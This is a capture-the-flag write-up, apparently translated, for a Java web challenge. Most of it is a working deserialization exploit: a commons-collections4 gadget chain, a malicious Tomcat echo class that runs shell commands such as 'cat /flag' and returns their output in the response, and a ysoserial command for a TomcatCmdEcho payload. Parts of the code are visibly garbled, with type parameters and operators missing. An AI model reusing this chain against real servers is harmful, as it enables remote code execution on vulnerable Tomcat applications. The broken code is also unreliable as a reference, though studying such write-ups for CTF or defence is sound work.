0x01 web

1.ezjava

Download the source code to decompile the jar file, and find that POST /myTest will have deserialization vulnerabilities

util, it seems to be useless in the end

Check the program and find that the common-collections4 of apache, and its deserialization utilization class has not been patched.

I saw commons-collection4-4.0 at a glance, so I directly used ysoserial to hit it

The test site found that it is cc4

Attached article

Plus spring-ech has ready-made pocs on the Internet

Make wheels!

package moe.orangemc;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.collections4.Transformer;

import org.apache.commons.collections4.comparators.TransformingComparator;

import org.apache.commons.collections4.functors.ChainedTransformer;

import org.apache.commons.collections4.functors.ConstantTransformer;

import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;

import java.io.ByteArrayInputStream;

import java.io.ByteArrayOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.Base64;

import java.util.PriorityQueue;

public class Main {

public static void main(String[] args) {

try {

ClassPool classPool=ClassPool.getDefault();

CtClass ctClass=classPool.getCtClass('Meow');

byte[] bytes=ctClass.toBytecode();

TemplatesImpl templates=new TemplatesImpl();

Field f1=templates.getClass().getDeclaredField('_name');

Field f2=templates.getClass().getDeclaredField('_bytecodes');

f1.setAccessible(true);

f2.setAccessible(true);

f1.set(templates, 'Meow');

f2.set(templates, new byte[][]{bytes});

TransformerClass? Object chainedTransformer=new ChainedTransformer(new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}));

TransformingComparatorClass? Object transformingComparator=new TransformingComparator(chainedTransformer);

PriorityQueueInteger queue=new PriorityQueue(2);

queue.add(1);

queue.add(1);

Field f=queue.getClass().getDeclaredField('comparator');

f.setAccessible(true);

f.set(queue, transformingComparator);

Field f3=queue.getClass().getDeclaredField('queue');

f3.setAccessible(true);

f3.set(queue, new Object[] {chainedTransformer, chainedTransformer});

ByteArrayOutputStream baos=new ByteArrayOutputStream();

ObjectOutputStream oos=new ObjectOutputStream(baos);

oos.writeObject(queue);

oos.close();

String result=new String(Base64.getEncoder().encode(baos.toByteArray()));

System.out.println(result);

} catch (Exception e) {

e.printStackTrace();

}

}

} According to the above code, it is found that it cannot be echoed, but according to Baidu, it can be used to echo using apache catalina. At the same time, this class library : is included in the package.

Write malicious classes:

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Meow extends AbstractTranslet {

public Meow() {

super();

this.namesArray=new String[]{'meow'};

try {

java.lang.reflect.Field contextField=org.apache.catalina.core.StandardContext.class.getDeclaredField('context');

java.lang.reflect.Field serviceField=org.apache.catalina.core.ApplicationContext.class.getDeclaredField('service');

java.lang.reflect.Field requestField=org.apache.coyote.RequestInfo.class.getDeclaredField('req');

java.lang.reflect.Method getHandlerMethod=org.apache.coyote.AbstractProtocol.class.getDeclaredMethod('getHandler',null);

contextField.setAccessible(true);

serviceField.setAccessible(true);

requestField.setAccessible(true);

getHandlerMethod.setAccessible(true);

org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase=

(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

org.apache.catalina.core.ApplicationContext applicationContext=(org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());

org.apache.catalina.core.StandardService standardService=(org.apache.catalina.core.StandardService) serviceField.get(applicationContext);

org.apache.catalina.connector.Connector[] connectors=standardService.findConnectors();

for (int i=0;iconnectors.length;i++) {

if (4==connectors[i].getScheme().length()) {

org.apache.coyote.ProtocolHandler protocolHandler=connectors[i].getProtocolHandler();

if (protocolHandler instance of org.apache.coyote.http11.AbstractHttp11Protocol) {

Class[] classes=org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();

for (int j=0; j classes.length; j++) {

if (52==(classes[j].getName().length())||60==(classes[j].getName().length())) {

System.out.println(classes[j].getName());

java.lang.reflect.Field globalField=classes[j].getDeclaredField('global');

java.lang.reflect.Field processorsField=org.apache.coyote.RequestGroupInfo.class.getDeclaredField('processors');

globalField.setAccessible(true);

processorsField.setAccessible(true);

org.apache.coyote.RequestGroupInfo requestGroupInfo=(org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler,null));

java.util.List list=(java.util.List) processorsField.get(requestGroupInfo);

for (int k=0; k list.size(); k++) {

org.apache.coyote.Request tempRequest=(org.apache.coyote.Request) requestField.get(list.get(k));

System.out.println(tempRequest.getHeader('tomcat'));

org.apache.catalina.connector.Request request=(org.apache.catalina.connector.Request) tempRequest.getNote(1);

String cmd='' + 'cat /flag' +'';

String[] cmds=!System.getProperty('os.name').toLowerCase().contains('win') ? new String[]{'sh', '-c', cmd} : new String[]{'cmd.exe', '/c', cmd};

java.io.InputStream in=Runtime.getRuntime().exec(cmds).getInputStream();

java.util.Scanner s=new java.util.Scanner(in).useDelimiter('\n');

String output=s.hasNext() ? s.next() : '';

java.io.Writer writer=request.getResponse().getWriter();

java.lang.reflect.Field usingWriter=request.getResponse().getClass().getDeclaredField('usingWriter');

usingWriter.setAccessible(true);

usingWriter.set(request.getResponse(), Boolean.FALSE);

writer.write(output);

writer.flush();

break;

}

break;

}

}

}

break;

}

}

} catch (Exception e) {

}

}

@Override

public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override

public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}

}

After going around, I found the modified version of Master Y4er's ysoserial

https://github.com/Y4er/ysoserial

Try cc4 combined with TomcatCmdEcho memory horse

java -jar ysoserial-main-1736fa42da-1.jar CommonsCollections4 'CLASS:TomcatCmdEcho' | base64

When sending packages, please delete Content-Type

The command was successfully executed when the second sending